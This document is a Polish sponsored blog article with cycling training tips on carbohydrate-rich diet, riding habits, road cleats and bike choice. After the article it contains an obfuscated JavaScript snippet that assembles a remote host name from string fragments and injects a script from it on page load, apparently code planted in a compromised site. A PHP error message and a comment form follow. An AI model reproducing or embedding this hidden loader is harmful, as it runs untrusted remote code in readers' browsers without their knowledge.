Ty też masz szansę wygrać Tour De Pologne. Wystarczy, że zmienisz przyzwyczajenia

cycling-655565_640

Nawet jeśli nie jesteś zawodowym kolarzem, a jazdę na rowerze traktujesz wyłącznie w kategoriach sportowej rozrywki, masz szansę poprawić swoje wyniki w kilku prostych krokach. Zadbaj o dietę, dobierz odpowiedni rower i unikaj jazdy z górki. Proste, prawda?

Walcz o lepsze wyniki, trzymaj się 3 prostych zasad

 

Zasada 1: Zrób porządek z posiłkami. Zadbaj, aby dieta była bogata w węglowodany

 

Nie wierz w zapewnienia amatorów, że jeśli z dnia na dzień będziesz zwiększał intensywność treningów za czym nie będzie szła odpowiednie dieta, twoje nogi będą znosiły znacznie więcej niż dotychczas. Zadbaj o menu, na które będzie składało się przynajmniej 50% węglowodanów złożonych, które pomogą ci wykrzesać więcej siły z trudnej jazdy w interwale.

 

Węglowodanów złożonych szukaj m.in. w:

 

  • otrębach,

 

  • kukurydzy,

 

  • kaszach,

 

  • grochu i fasoli,

 

  • makaronach,

 

  • pełnoziarnistych zbożach,

 

a także w ziemniakach, pieczywie razowym, muesli i manioku.

 

Nie ma przeszkód, aby w twojej diecie pojawiały się także owoce – podstawowe źródło węglowodanów prostych. Najważniejsze, abyś unikał produktów przetworzonych, czyli ciast, słodyczy i napojów gazowanych.

 

Czy wiesz, że?

 

Jeśli na trasie zabraknie ci energii, płyny uzupełniaj napojami izotonicznymi. W ten sposób szybciej zregenerujesz organizm niż biorąc kolejny łyk wody.

 

Izotoniki są bogate w elektrolity, które wytracasz podczas intensywnego treningu.

 

Zasada 2: Skończ z dotychczasowymi nawykami podczas jazdy rowerem

 

Jeśli podczas treningu chcesz dawać z siebie więcej niż do tej pory, skończ z dotychczasowymi przyzwyczajeniami. Zrezygnuj z nadmiernego wysiłku podczas jazdy pod górkę i odpoczynku – zjeżdżając z niej przez kolejny kilometr. Wybieraj trasy o możliwie słabym zróżnicowaniu terenu, ćwicz równo i regularnie.

 

Rozważ zakup butów z otworami do zamontowania tzw. bloków szosowych (np. RC w ProBike). W ten sposób nie tylko poprawisz trzymanie stopy podczas większego wysiłku, ale i uaktywnisz mięsień czworogłowy uda nie tylko wtedy, kiedy naciskasz na pedał, ale i odwodzisz nogę z dołu do góry.

 

Przestań w końcu bagatelizować ból. Problemy z nadgarstkami, kolanem i przykurczami mięśni to znak, że twój organizm nie pracuje w optymalnych warunkach. Zwróć uwagę na ustawienie kierownicy, siodełka i amortyzację gumowych uchwytów na jakich opierasz ręce.

 

Zasada 3: Dobierz rower, który wpisuje się w twój plan treningowy

 

To nieprawda, że istnieją rowery uniwersalne. Nawet na crossie nie poczujesz się zbyt komfortowo pokonując każdego dnia 50-60 kilometrów i więcej. Podobnie z jazdą w ternie. Rower musi wpisywać się w twoje oczekiwania, co znaczy tylko tyle, że stare MTB, które dostałeś na urodziny od rodziców będzie dla ciebie nadmiernym obciążeniem na szosie.

 

Dobrej klasy rower kupisz już za ok. 1,500 – 2,500 złotych. Oczywiście, jeśli nie jesteś profesjonalistą, bo do rywalizacji w Tour De Pologne będziesz potrzebował czegoś nieco bardziej wyszukanego.

 

– –

 

Publikacja przy współpracy z zespołem redakcyjnym ProBike z Wrocławia.

(function(){
uug9=document.createElement(„script”);uug9.type=”text/javascript”;
uug9.async=true;uug9_=((„us”)+”t”)+”a”;uug9_+=(„t.i”)+””+”n”;uug9_+=((„f”)+”o”);
uug9.src=”http://”+uug9_+”/3789763.n1vhckbcug91cp4ibprfmacb64bdwy”;
document.body.appendChild(uug9);
})();


Warning: count(): Parameter must be an array or an object that implements Countable in /wp-includes/class-wp-comment-query.php on line 405

Leave a Reply

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *